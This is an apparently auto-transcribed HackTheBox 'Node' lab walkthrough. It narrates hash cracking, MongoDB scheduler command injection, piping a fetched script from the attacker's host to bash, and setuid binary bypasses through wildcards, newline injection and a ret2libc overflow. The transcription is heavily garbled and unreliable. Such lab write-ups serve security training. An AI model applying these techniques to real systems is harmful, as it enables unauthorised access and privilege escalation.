HackTheBox - Node

what's going on YouTube this is IPSec and let me do a note from hat to box I'm gonna be rushing through this box a little bit because it is Saturday at 11:00 a.m. which is after the time this box retired long story short I thought Catterick was retiring it didn't node was retiring so I was up until 4:00 a.m. today doing a video on Catterick not realizing that it was node I should have been doing a video on so it's gonna rush through this machine thankfully rasta team had published his write-up for it so I learned one new method of exploiting this I knew of two ways to do the binary at the end but apparently there are three so we'll be digging into all three right now so let's jump in just it off we're gonna do a end map so I'm gonna make the directory and map and I'm just gonna end map - P - to enumerate all ports - t5 to make this go quick - n to not do DNS vvv to make a map verbose and show me ports as they come back and the IP address of node which is 10 10 10 58 I forgot - Oh a to specify the output in all formats and I'm going to do initial and we'll do no script and take off this - P - so we're not going to do all ports because I want this to be done quick so it's gonna do the top 1000 ports and we have that finish so we have 22 and 3,000 so I'm going to do a - SC - sv for default scripts and numerate versions we can get rid of that vvv we do Oh a we can do this initial and we're gonna do - P 22 3000 this shouldn't take too long while that goes we can go to nodes IP address 10 10 10 58 for 3,000 I probably have to turn burp proxies off and we get a webpage based upon the hostname I'm gonna guess this is node this n map has finished we do have 3000 nodejs Express framework log in my space of my place nothing too interesting so I'm going to do a full port skin in the background so nmap - P - - t5 we don't need that - n + map all ports 10-10-10 58 and we'll name this and that so let's look at this page we got well a page so let's go Buster it so opt go Buster go Buster - each we will want to do - you for URL HTTP 10 10 10 58 for 3,000 - W for the word list so user share word list doorbuster and would do directory list lowercase - 3 medium wild code response found so let's see what this is that is odd we don't get anything but der buster says we get something so what I'm gonna do is put do Buster go Buster through a proxy and to do that I'm just gonna use burp and create a new listener I'm sure there's a flag to do it in go Buster but I always just find this the easiest way thousand ok strip that and now if I go to localhost 8080 one you can disable my proxy it's going to still go through Bert so we still get that let's turn intercept on and see what happens so go to HTTP history we're getting this file and a response is some type of troll thing which is interesting because when we just used a browser to do it we didn't get that so set proxy back on for this request go and we get a page so looking at these two requests the main difference is a user agent so let's just copy this user agent over to the skill Buster and we'll see what happens and we get that so there is some type of filtering being put in place to stop go Buster from doing a enumeration so to fix that do the - H again and - a is set user agent string so we're gonna be using that - a and we'll put that in quotes I copied too much that's a go back to boot copy this paste except off and except dawn here backslash as I want hopefully it's go anything out so now go Buster is set to use a user agent and it's still looks like it screwed up let's try this again if we do see - FW as it says we get 200 responses back for absolutely everything so we screwed something up let's go back into boot and this app done send the request repeater go it doesn't look like it should do that if we get a random thing ah so everything is returning a page so go Buster isn't going to be too handy we could use do Buster and filter by size but we're just gonna skip over this whole do a Buster enumeration because it's giving us a lot of trouble so let's go to proxy a target tab go to a page and we got a bunch of junk let's delete the host killer buster and refresh the page so we're going to use burp to spray to this host and just click yes to add it to scope and now we don't have to use go Buster because we already have the page we just won't find any hidden content so since we're not going to be using go Buster order Buster to find hidden content what I'm gonna do is find the apt j/s which should be and JavaScript app fjs I'm gonna look at the response so we can send this over to repeater to make it a bit bigger but this is gonna give us the routes for the web application and tell us a bunch of pages that we don't have so we see a template URL to slash parcels slash admin dot HTML and over in a proxy or a target tab we don't have them into partials so let's just go there most like this function doesn't work only admin users have access to it so we probably don't have permission the next thing I want to look at is go back and repeater we have a profile and a home nothing there and we'll check out the home nothing there so let's go back into the targets tab and look at what else we have we have API users and we have this slash which has looks like usernames and passwords so we click go let's make this a bit easier to read we can set ass new line so we have the username my place admin account with a password of a long string free echo - and on that and WC - see we have 64 characters so I'm not exactly sure what this is it's an even 8 and they're all evenly divisible by 8 and all the accounts are that so I'm gonna assume it's some type of hash we have is admin true for that my place admin account for Tom admin false mark false roster ting false we have a bunch of passwords and user accounts so let's figure out what this hashing algorithm is there are two ways we can do this we could just go to google and type like hash identify github and use an online hash identifier but not online use a hash identifier or I mean just go to hashes org and submit the hashes and see if it actually cracks and why caches don't work because they have a relatively complete or a good dictionary or whatever so we can submit up to a thousand hashes so let's copy them and the final one let's share the algorithms have found and submit we see it is just shot 256 plain and we have three of them we got Manchester Sponge Bob and snowflake so the my place admin dff is going to be Manchester f0 is gonna be Toms that is spongebob and the next one would be mark and his password is snowflake so since my place admin is the admin user let's do that account so proxy set to off and we can login let's turn spider off for now or we can just have spider don't submit forms I hate my spider some it's forms let's go back to it well again I have the password my clipboard so paste that and we'll go back here copy the admin account well again and we can download the backup so clicking download backup we get a save prompt and then we can just copy the backup into our new directory if we do a file on it we get ASCII text with very long lines looks like it's just base64 so base 64 dash D my place not backup would direct that - I don't know exactly what that is so I just called it unknown if we do a file on that we got it as a zip archive so we'll move it to backup dot zip if we unzip it we have a password on it so what we can do is use F crack zip and we want to specify - capital D for dictionary and then - P for the word list and we do user share word list rokkyo text and of course we have to specify the zip file so it looks like magic word maybe the zip password so unzip again type magic word and it looks like that was indeed the password so now we have the source code to the application so what I want to do is search for password so I'm going to grep - all right well it could make it case insensitive for password and do dot to get everything and it looks like we got quite a bit of junk so just pipe that to Wes and we'll go through it we have a MongoDB thing bunch of stuff and JavaScript the web page so we've got more stuff and then junk so let's find out where the connection is controlled so we look at app J s we do have the client and we have potentially the password so mark and then this string and that's going to localhost 2701 seven if we go back to an nmap scan we scanned all ports we only have twenty two and three thousand open still so let's just try SSH ain't with those credentials so if we get mark out of app j s we will see 10 10 10 58 I think is the IP we can log in to the box with that password so he reused his MongoDB password as his local user password so I want to do a vertical split I'm gonna win probe ask and do I've landed I'm here yep so place before I do that if config ton zero get my IP address and then we just do python m simple HTTP server and we'll curl 10 10 14 3 port 8000 win another seat to bash and what we're doing here is just checking for common probe asks see if we see anything interesting so we can go to the top and begin searching through this so going through this we can see the colonel 2017 so relatively recent probably not going to be a colonel exploit it's Ubuntu 1604 three first names node we're current user in group Merc and win the group Merc there's a connection to 10201 I don't know what that IP is that's an odd IP from Tom we also logged in mark group memberships we have lxd where is that no one so we probably don't have that prevents our zone calamity relaxed home directory permissions on Frank mark and Tom so probably should look into those home directories environment variables cron jobs don't look like they have anything unique we're looking at the ports we have that high number port listening only on localhost 2701 7 I believe we said that was based upon the apt rjs we looked at processes see we have a node scheduler running as Tom so we probably want to look at this for a scheduled app.js file config Etsy decomp so and it looks like we have someone else on this 1010 14-7 because there's a reverse shell going on but let's take a look at that so less ver scheduler FJs you can see what's going on it's all saying - MongoDB as Marc taking everything in the tasks collection and then passing it to exec and then deleting the tasks so it looks like this scheduler will run a command once and this exact is probably going to be a shell command so let's take a look at that I'm gonna cat the scheduler so we can copy the password and we want to copy this and do - Pete because when it's best by a password - you mark when we connect to the scheduler database as indicated right there well right here and the password login failed I copied too much copy too much again if I could actually read what I was highlighting it would be amazing so manga - P - you mark scheduler and we get connected in so what we have to do is create a document now so let's see it's looping through that Docs and we're going to create one with the parameter CMD so DB dot tasks yep and I got tasks from this DB collection and we want great now is it insert yes we got insert command and mangu likes everything in JSON so insert CMD : and we want to do something like we can copy - so CP let's see okay - hey just do which - then - then - to tap epic and we will chmod six seven five five then - and I will and that would semicolon that looks good we inserted one command so if we do DB tasks dot find we can see our command is there and we'll give it a little bit of time to see if it executes the reason why use - is because - normally doesn't drop the set UID bits and the set UID bit I'm doing is six which is both user and group users for group is - I think one is a sticky bit which is a bit different we cdb tasks doesn't have it so I'm gonna press ctrl D to exit and I'm gonna see if slash temp if SEC is there it is and Tom owns it and the reason Tom owns it is again from our Lin enum checker FLE PS aox grab sched we see that tom is running the scheduler that's why we started looking into it so if we just execute temp if SEC we are now mark wait let's who we started as that's not right Tom owns it and has the do not have set UID bit on it that's odd I guess we'll go back in and try this again scheduler app J yes - you - PSU scheduler Dan copy the password DB tasks insert CMD chmod we'll just do it this way and I forgot to make it JSON DB it up find Desktop find looks like it ran OSS la town hip sac sticky bit set ID know that flag there we go I guess that's specified that - PFLAG but no effect of what you ID is Tom so we do Who am I we are now Tom so so now that we're Tom let's go into a home directory and CD home Tom and create the ssh can't do that looking in permissions of the home directory everything's owned by root and we don't have write access to our home directory what I wanted to do is just drop an SSH key so I could SSH in as Tom but can't do that so let's curl ten ten fourteen three eight thousand when I'm done SH and run this again and see if we have anything interesting so Colonel information we looked at that Hearst name up group path shells I'm just looking at the red text to see if there's anything we haven't really looked at and I'm looking for like sent UID or su ID in particular because we haven't looked at those files yet file locations nothing let's do this manually find dashhome 4,000 no fine / so we do have sent UID bits on the file I don't know why it didn't show in a Linux primp tracker script or Lenny num so let's check that out set UID camelcase su would okay found it here so we do search for s set UID files Oh throw equals one so if we go to the top we do see options key words export report name and stuff but t include thorough lengthy tests and if we have that option it sets thorough equal to one so let's do that just hard code it the alternative would be to download the script and use the actual command line flags but I okay he's getting to this way so ten ten fourteen three four eight thousand when I'm mom SH he's cute - so let's see what the set UID stuff looks like in this script directory there we go we have set UID files and GUI D files so looking at these we do have one that I don't recognize user local bin backup it's owned by a group and the group is admin and admin can execute it so we should take a look at that we also have a shell but let's take a look at this user local bin backup so first run a groups we're still in the mark group we have to escalate up to the what we'll call it admin group so let's chmod G + S on hip SEC and then exit slash temp hip sack - p ID don't seem to work see let's remove the sticky bit or a second YT bit I always call it sticky and then chmod six seven five five temp up sack so we can set it CH own Tom admin Who am I I am Tom I cannot change it even though tom is in the member so let's use to change that so my effective UID is only going to be 1,000 so if I do that I don't have the group ID so that's why why my chmod isn't working so let's get ver scheduler happy yes - B - you scheduler password this and then DB tasks answer because this is probably going to have all the permissions of Tom so we want to do another CMD and we'll do CH own Tom admin on tap if SEC and then we have to chmod 675 5 on Tam hip sack oops that should be good DB dot find whoops there we go DB tasks got find looks like it's all the way around so LS away tap if SEC Tom admin so what execute that with dash p ID and we're now in the admin group so I couldn't change it to admin before because I was not in the admin group to change it to but again MongoDB is running natively under Tom so he has all the group permissions set to him but now that we have that group it we can now do user local bin back up and we get nothing local then back up slash still nothing that's eight permission denied oh when I did bash it removed it use it local then back up - each still nothing so what I'm gonna do is pay 64 use your local din back up I'm gonna copy this actually that's pretty big so we'll just use netcat to transfer it the boxes this is mood netcat LVN P listen on 8081 I guess we'll call it back up pull up long direct already in use that's right burp is using that 80 82 and we'll do NC user 10 10 14 3 80 82 user local been backup so md5sum I'm back up md5sum user local been back up we have the same file and now we can begin analyzing exactly what backup does so let's make this executable with chmod plus x backup and then execute it we get absolutely nothing back so let's run an ass trace on backup and doesn't really do anything and exits gracefully so let's analyze the assembly so radar to backup analyze with aaaa print out the function list with a FL and we can do vvv data visualization mood scroll down so with the asterisks is equal to the same main gee twice and then you can do spacebar to change the view and we get into a pretty call graph look I think it's a flow graph whatever this is called we get into this function view and we can see that there is a jump right here and it goes straight to an exit and if that is not equal to three arguments it looks like it takes that path so let's open a new pane and I just get back up with three arguments and we get could not open file so let's do a system trace to see what file it is and we see it's trying to read something in Etsy my place keys so if we go to a box and cat Etsy my place keys we get this file so let's copy this out go into our box make two Etsy my place v Etsy my place keys and paste it the next thing is something we should have done a while ago and that is go into the app J s so I forget exactly where this is yes do we have okay so vote dub dub dub my place and now we can grep - I back up and let's do capital R for recursive and now we're looking at how back up actually works so in app KS we see the function that we want so constant backup key is equal to 45 FAC and if we look at Etsy my place keys that is one of the keys so here is the black list for doorbuster purse man I'm guessing this may be go Buster I know there's go that blockless go Buster back up and we can see the code for the backup piece now it's gonna spawn use a local bin backup - cue the backup key then the directory name so if we go to a backup we can do dot slash backup - cue the key he could probably any one of these keys and the directory name so let's do slash root and I know my root directory is a lot bigger than this so let's unzip this on base64 and see what this is so unknown dot be 64 base 64 - D unknown unknown file it it is a zip so let's move unknown to unknown dot zip and unzip this it's skipping something so let's try 7-zip and a password probably magic word that was the password we had before and it decompressed it so it looks like root Texas in that and we get a trollface so that's obviously not what what was supposed to do so let's remove unknowns and check out what is going on with this binary so it looks like if - Q is there then this won't happen and this is the computer graphic and did we do that yes and if we remove - Q we need three arguments then we get that computer graphic okay so we know what's going on right here scroll down so after that computer graphic we jump here it's doing a bunch of things we get a call to F open right here so I'm guessing this is probably where we are reading the Etsy my place keys just going around and this wood starts to get interesting and after this we'll loop in a binary ninja because it makes it a bit easier to read I just want to show you the free way to do it so right here is kind of a sanitization thing we can see Raiders being nice and telling us exactly what would be here right now it is I think two periods if it's two periods they go all the way over here come on there we go and it's pushing that base64 string of that trollface so I'm sure there's a way in radio we can make this print a bit nicer but that's what's going on and we can go down we can see slash route is also there so we can't do bad cares dot dot slash route let's see what else this is a bit painful to view but this is what you get for being free and it's actually doing something better than what binary binary an angel would do so we have another one is a semicolon and we can verify this by just saying hey if we do slash something turgut path doesn't exist slash route it does ruh doesn't exist it was semicolon and bash did that actually work I don't think it did but it may have there's no way I'm gonna try this real quick let's go over to SSH use a local bin backup one we can do - Kiel let's see my place keys backup - cue and - nope oh I'm an idiot that has to be in quotes wait we need three arguments yeah so what happened here is I don't have this in comments there we go and that's the troll face we saw that because that semicolon is a bad character hopefully that makes sense we also have and as a bad character see another bad character and again I'm just going through and looking at what binary ninja says are bad characters and every one of these is going down to that base64 junk see pipe is a bad character see this is going to an actual memory address that is as well that sees a bad character so you get the gist right there so I'm gonna open up binary ninja and we're gonna analyze this file with that tool because it's a bit more friendly in the video mainly because I know it better as you can see I'm having trouble even just getting out of this oh there we go just Q so op binary ninja we can open the file and we can see this is a much more friendly input but it's not Auto expanding some things like we saw a queue over here so maybe we can edit tools analysis module linear suite maybe no maybe it's in a future version I don't know so that's the call to exit skip down here okay this is where we have the black list because we can see let's see is this the first one could not open file dents a magic word here we go all these if the string exists go down here and that's the base64 we don't want to hear so let's zoom back in we can see push and then tui is what this is pointing to finally a raider was actually showing us what this was but tui let's see what that is next to ask e2e is a period that doesn't look right what did we say was just before /root two periods Oh tui tui threatened all by it I wasn't looking at the next ring so this is the two dots we have /root here so it detected that one this push 3b I'm gonna guess that is a semicolon yes then we have the next 126 that is going to be ampersand 60 is gonna be the back Tec 24 that's going to be the dollar sign and let's just spot check that yep 7c then we get to the string this is going to be double slash and I'm just reading at the very beginning to F to F and then didn't all bite the nobody terminates the string so it's gonna be double slash as a bad character and then this maybe just slash is a bad character slash Etsy's bad and now we're getting into the next piece we're actually doing the backup so just / and / Etsy so there's all the bad characters we have then now it's assembling the string and we're calling usually bin zip with the password of magic word and a user input so if you noticed we don't have just root we have slash root as a bad character so if we go back to our SSH and I'm just doing that so I have it on my terminal good a slash and call use a local bin backup - cue copy this and just say root because we're at slash and it's not changing the directory before it so it goes well current working directory is and we get a bunch of base64 we can copy this I don't know what I just clicked I'm hand slipped copy be test base64 base64 - D - test dot zip and then unzip test dot zip and the password is magic word and we see it did unzip root text if we do a WC - character count on root root text we get 33 and that's got a line break in it so chances are that's an md5 sum in that file so that is the first unintended way to do this binary there is another way unintended method of this binary we're gonna do like 30 unintended methods and then the intended which is a buffer overflow so the next unintended method will be abusing wild cards and I notice what I did and I open that in a new terminal window so won't codes if we look at our bad characters we have slash route but if we do like CD / or question mark question mark route like that we just go to the directory and that will only works because there's nothing else in route that has that name so if we make directory or PPT and we try to CD to that we get too many arguments because LS / are a question mark question mark T Oh so just LS that directory I realized because OS went into two different ones we have that slash root and then this last root so it matches two things hopefully that makes sense so let's move our PPT and go back to our SSH run this command again and would do slash our question mark question mark T that is the troll face so I think we may have to specify the entire file there we go we got a different input so we specify the entire file we get this we copy this out the zip be 64 that's a bad file name but oh well zip be 64 - what do we want to call this root zip unzip root our zip file root zip ASCII text oh crap page 64 - d unzip it magic would replace sure it extracted if we do a WC - see we get 33 characters again that's a md5 hash because there is a line break in that file so that is method to method three is through command injection so if we look we don't have it filtering any newline characters and it's just calling to see where is it system so system will also allow us to do a new line to execute code so that would look like if we had bash dot h ID and then the second command so that's how that one works and i know we can do it through print F but I want to try something so let's know I think we have to do it through that but anyways this is one of the famous Nagios exploits if you look at n RPE it was one book to this and if you haven't I just Google like n RPE command injection vulnerability it's like I don't want to say 2014 maybe maybe even older Nopec ve command injection o 2014 but this is the most common time I've seen this exploit he's against that software in particular so to do that I'm gonna look back at binary ninja and look at the zip function and it's trunking that out poke is very long so and we see the full command is user bin zip - are and we're directing to dev null and then again the string terminator here so the string is I can't highlight this way now but anyways since it's directly Devon all we're gonna do three parameters or three lines so let's go back to SSH and I'm gonna try something real quick before we do it we'll try an easy way just put a double quote here and we're gonna do junk then - and then junk and we did that junk at the end for the third line because again binary ninja is telling us it ends it with Devon all so that's how it ends so if we didn't add that to in line that Devon all would be on a bin bash and that does work so we don't have to do printf we can just do it with quotes and we are now UID as root and we just could go to slash root now and look at root text if you didn't want to do it that way you could just print F and do it this way that should be it yeah that works as well and the reason why we didn't get a hit the black list because dollar sign is on the black list but a terminal is interpreting this before we send it and print F is just a function that we can test new line what do I need single quotes oh I have print not printout but yeah burneth just requires that line break and allow us to do that if we did an echo I don't think it obeys new line no it does not so that's why I said printf earlier so that is probably the coolest way to do the binary and then we have method number three which is gonna be the hardest method to do and that is the buffer overflow so the first step is to check what compile time instructions or compile time protections are enabled so we just run check SEC on it and we see that DEP is enabled and SCIC ASLR is not on this binary so if we delete all breakpoints okay we don't have any we can set a breakpoint for main run this and then do jump call and see if we had any jump ESPs or got lucky there because this binary probably isn't gonna be randomized I don't think it can be but don't have any dangerous instructions right off the bat so the next easiest thing is to do like a return to Lib C attack with brute-forcing because we have unlimited tries at this binary I think October did this one of my videos early videos did this I want to say October but it may have not been but I'll put it in the description because I'm gonna go a lot more it into right to lib see back then than I am now so what kind of gonna rush through this and instead well look at some static analysis so we'll go back to binary ninja and let's look at a vulnerable function STR copy this should be STR n copy and then we're going to look at something we can recognize so display warning don't know what that where that gets displayed success don't know where that gets displayed turgut I know exactly where this is so we're going to target this one and we have us making space on ESP which is the effective stack pointer 208 let's see 512 is 200 so 200 8 would be 520 then we're gonna free up an additional few bytes and then push stuff to it so I want to say like 508 maybe I don't know but between 500 and 600 we have a buffer overflow right here so to figure out how to get to display target so we can go to display target and main and see there is a function just before it so let's run our backup script twice and see if we can get it to display what we're archiving so can't Etsy my place keys okay and then we want to call user local been back up with - cue the key and root we don't get anything city slash we don't get much output at all so let's remove that - cue don't get anything we need three arguments so we'll do it SEC I think it'd be literally anything started archiving root so this is where the buffer overflow is if we go back into display target starting archiving % n so we can't have that - cue flag there we just have to put anything else in place so let's go back to gdb and let us delete the breakpoint on main and we'll do pattern create 600 let's get rid of that and now let's call this so run will do it Zack the key on this I think is ABC and paste this this has special characters so we need to put this in quotes and and never said that just said validating access token and encoded backup is below but this we just hit the bad characters so we had one of these bad characters and our string I don't know what it was maybe percent Oh semicolon I see a semicolon like right there is that the only semicolon we have a dollar sign to glancing over this hopefully this doesn't screw anything up place there's - still nothing so we still have some bad character see this pattern create have a bad character flag it does not so we'll just do Python - see brent 8 times 5 20 place on see read a times 5 20 and we'll see if this crashes the program run if sec ABC 5 or 20 AAS we do get a seg fault so let's change that to 510 we did crash but we didn't fully over iTIP because we don't have for one for one for one so let's try 5:15 there we go we have three for ones so if we do 5:16 run ABC now we have a fully IP over ight so we can print 512 A's than for B's there we go and the last thing I want to do is I had changed my place keys to make it easier but what we're going to do is revert that so yeah at C my place keys and I'm just doing this in case for some reason it affects the stack I want to make it as close to production as I can so let's take a key has to have ABC put this and we're still good so we know at 512 A's I should have saved that so 5:12 a x' equals junk after that bites 5:13 - was it 5:17 equals e IP over right okay so we have that in our notes so we got to make the skeleton exploit and search for all the return to Lipsey addresses instead of creating a new exploit let's just look at my october stuff and I do have a buff PI and October and again this is what I did a return to Lib C so we're gonna use this as the skeleton exploit so we're gonna copy this over to a guy so VI buff pie taste this okay and I am in dev s hm that's why I can write and I'm also I do a nested T MUX can't create socket permission denied done so we'll just have this that's set paste I'll paste it here so we can do stuff side by side so the first thing I've to replace is that Lib C base address and we got that by doing l DD use a local Bend back up and grep for web seed on SO dot six and that's going to change constantly because of a SLR but one in like 250 times will get it correct so again if you don't know any of this I recommend watching October so the system offset that is gotten by I think read off again - s web 30 - and Lipsy necessary for system okay we want this one and not copy if I'm not in the window huh they're Island I need that 0x we don't need exit but I won't see if we can get it quickly exit I think it's this one and the argument offset this will been sh s and that's what changes a little bit we do strings - eh - TX libs 32 Lib C dot s 0.6 and we grep for den Sh and that one is 0 X 1 5 9 0 0 just make this pretty think that's right ok we'll send let's see send 512 A's and don't know if that's right trying to think real quick if we have to go back afford I think that's right so after 512 A's we write our system address and then we also put exit and argument I think that's right if not it's 504 or something but we'll try this so use a local bin overflow this is now back up and then if SEC is one argument key is the other and then buff so K at see my place keys do that I plus equals one fix that bug and I guess we can try this do this so I can copy it M left up I need only file will call this exploit PI Python exploit PI and must contain only two arguments so I screwed up this call it's binary then I guess read-only file sweet I guess the you mask is weird on this or something so if Zack space space plus buff uh-huh I'm screwing up my call somehow not exactly sure how I'm doing this let's see so I'm pretty sure I had it right the first time you can do multiple arguments here so let's fix this then we can do type buff and run this we gotta print it okay it is a string and it's saying Zack V must contain only strings so let's verify it's still a string when it makes its way in here whoops it is not so let's see that is odd let's change that back to buff that start commenting this stuff out okay it likes the A's likes the a s plus system address it's fine with that if this works I'm going to be so baffled no so as soon as it hits that argument it starts having an issue so maybe we can add trailing beasts the end of this huh that's exact same code as all the other function pointers just gonna add a B there don't think that would do it oh it's working now so one thing I want to do whoops now take that print after the call done I was hoping I could try to get it so we can see the try number but it doesn't look like we can because this ascii is just too big so at try 51 but it's gonna try a few hundred times and maybe we'll get lucky and hit the address and hopefully that adding the be there did not up everything i don't think it did but no clue what was happening there to be honest and it should hit sometime soon we're at 127 this is the dangerous thing with brute forcing yeah so uh see dude hang it's no longer starting archive it died let's try again and we immediately get it that was odd no clue what happened but as you see we are now route we can go into slash route and we could also get the flag so hope you guys enjoyed that video I feel like this has been a really long time so yep I'll see you guys next week with hopefully coatrack if it is that box that gets retired well the video is done so my week will be easy take care guys later